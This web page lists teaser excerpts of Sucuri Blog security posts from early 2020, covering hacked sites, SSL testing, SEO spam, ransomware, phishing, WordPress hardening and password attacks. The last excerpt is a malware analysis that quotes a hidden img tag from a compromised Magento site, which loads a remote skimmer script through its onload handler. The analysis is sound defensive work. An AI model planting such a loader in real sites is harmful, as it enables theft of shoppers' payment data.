Call Us Today at 1-403-291-9811 or 1-866-291-3857

Web Security

  • Is My Site Hacked? 19 February 2020 Is My Site Hacked?

    It’s a day every website owner fears. You open the website you’ve poured your time, energy, and money into, only to find your home page looking very different.

    After your stomach sinks and you take a long gasp, you’ll likely shout out in frustration, “My site has been hacked! What do I do!?”

    But not every website hack will be this obvious. While some hackers are motivated by vandalism, most want to keep a low profile.

    Continue reading Is My Site Hacked? at Sucuri Blog.

  • SSL Testing Methods 17 February 2020 SSL Testing Methods

    Not all SSL configurations on websites are equal, and a growing number push for HTTPS everywhere. There is an increasing demand to check and quantify that little padlock in your browser.

    Some simple online tools provide a fast SSL report. They are SSL configuration checkers, which do not just check a certificate, which is really only part of that configuration. Instead, they perform a more thorough look.

    SSL Shopper

    SSL Shopper delivers very fast results, normally within 4 seconds.

    Continue reading SSL Testing Methods at Sucuri Blog.

  • Abused Cloudflare Workers Service Used to Inject Korean SEO Spam 13 February 2020 Abused Cloudflare Workers Service Used to Inject Korean SEO Spam

    We were recently contacted by a website owner about some malicious injected spam links that were being indexed by Google’s search engine crawler Googlebot.

    What was especially frustrating for the website owner was that these spammy links were not being loaded on the website when viewing it from a variety of devices — making it difficult to pinpoint or troubleshoot the issue.

    This behavior is not uncommon when dealing with SEO spam related injected content.

    Continue reading Abused Cloudflare Workers Service Used to Inject Korean SEO Spam at Sucuri Blog.

  • What is Ransomware? 12 February 2020 What is Ransomware?

    Ransomware has been one of the scariest topics in cybersecurity for years – and for good reason.

    Living up to its name, ransomware is a type of malware where a bad actor blocks access to data or applications until payment is received. In other words, it turns hackers into kidnappers of your information. And much like a kidnapping, there is no guarantee that paying the ransom will result in a happy ending.

    It may sound like paranoia or something out of an episode of Black Mirror – and yes, they have done a ransomware episode.

    Continue reading What is Ransomware? at Sucuri Blog.

  • Spamdexing: What is SEO Spam and How to Remove It 10 February 2020 Spamdexing: What is SEO Spam and How to Remove It

    If you’re wondering what is SEO spam, a good way to gain an understanding is finding this wily beast in the wild. In your favorite browser, search with the terms buy viagra cialis. (You might want to check over your shoulder first.)

    Now, without clicking anything, scroll through the results. Doesn’t it seem odd that seemingly non-pharmaceutical websites are advertising these medications?

    You’ve just spotted a few likely examples of spamdexing, where innocent websites have been hacked and injected with keywords intended to lure traffic to bad actors’ scams.

    Continue reading Spamdexing: What is SEO Spam and How to Remove It at Sucuri Blog.

  • Creative Phishing for Digital Gold on RuneScape 6 February 2020 Creative Phishing for Digital Gold on RuneScape

    RuneScape is an extremely popular massive multiplayer online game. With over 200 million generated accounts, its claim to fame is that it’s one of the largest free MMORPG’s ever created.

    At the current time of writing, 1 million in-game gold pieces is valued at around $0.60 USD on the black market. The wealthiest players can have upwards of billions of gold pieces in their accounts — with the average player having anywhere between a few million to a few dozen million.

    Continue reading Creative Phishing for Digital Gold on RuneScape at Sucuri Blog.

  • 6 Simple Steps for Hardening your WordPress Security 5 February 2020 6 Simple Steps for Hardening your WordPress Security

    Having a secure WordPress site does not need to be a challenge. Hardening a website means adding security layers to reduce the risks of attacks and hacks.

    6 ways to Harden WordPress Security

    You can harden your WordPress site by following these six simple steps:

    1 Keep WordPress updated

    It is important to keep up with the latest WordPress updates. No matter if it is a security or a maintenance release, make sure your WordPress site is running on the latest version.

    Continue reading 6 Simple Steps for Hardening your WordPress Security at Sucuri Blog.

  • Fixing “Uncommon Download” Warnings in Google Search Console 3 February 2020 Fixing “Uncommon Download” Warnings in Google Search Console

    Over the past few months, a lot of website owners have received “uncommon download” warnings from Google Search Console. These warnings can be vague, often lacking specific information about where the download is, exactly.

    Don’t panic — a lot of these seem to be false positives and you can just request a review. Read on to be sure your site is safe before you check the box and click the button.

    If you aren’t familiar with Google Search Console, you should sign up — it’s free and totally worth it.

    Continue reading Fixing “Uncommon Download” Warnings in Google Search Console at Sucuri Blog.

  • Password Attacks 101 31 January 2020 Password Attacks 101

    One of the most common attacks carried out nowadays is related to cracking passwords, but most people probably just know about brute-forcing. There are, in fact, other kinds of attacks around passwords.

    Let’s take a look at three kinds of password attacks.

    Brute Force Attacks

    Brute forcing in its essence is trying many passwords to gain access to an account.

    Read the Brute Force Guide

    Brute Force Real-life Comparison:

    Let’s say that a burglar wants to get the door to your house open, but he can’t find an entry point or another place to break in anywhere.

    Continue reading Password Attacks 101 at Sucuri Blog.

  • Hacked Website Threat Report – 2019 28 January 2020 Hacked Website Threat Report – 2019

    The threat landscape for website owners is constantly shifting on a regular basis — and it’s becoming increasingly more complex. As attackers continue to develop tools and find new vulnerabilities to massively exploit, our team works diligently around the clock to identify, analyze, and protect website owners from compromise.

    Education is key to protecting yourself from emerging threats. To address this, we are extremely proud to release our 2019 Website Threat Research Report.

    Continue reading Hacked Website Threat Report – 2019 at Sucuri Blog.

  • Web Swiper in Image Title 27 January 2020 Web Swiper in Image Title

    Cybercriminals regularly try a variety of approaches to hide their malicious code — web skimmers are well known for using all sorts of obfuscation and masquerading.

    Suspicious Img Tag

    Our malware analyst Liam Smith recently discovered a suspicious looking image tag in the database of a compromised Magento site.

    <img height="1px" width="1px" style="display:none;"
    src="/skin/frontend/smartwave/mango/images/cs_logo_white.png"
    title="hxxps://intljs.rmtag[.]net/js/slider.js"
    onload=jQuery.getScript(this.title)>

    At first glance, it just looks like <img> tag that loads a real image file.

    Continue reading Web Swiper in Image Title at Sucuri Blog.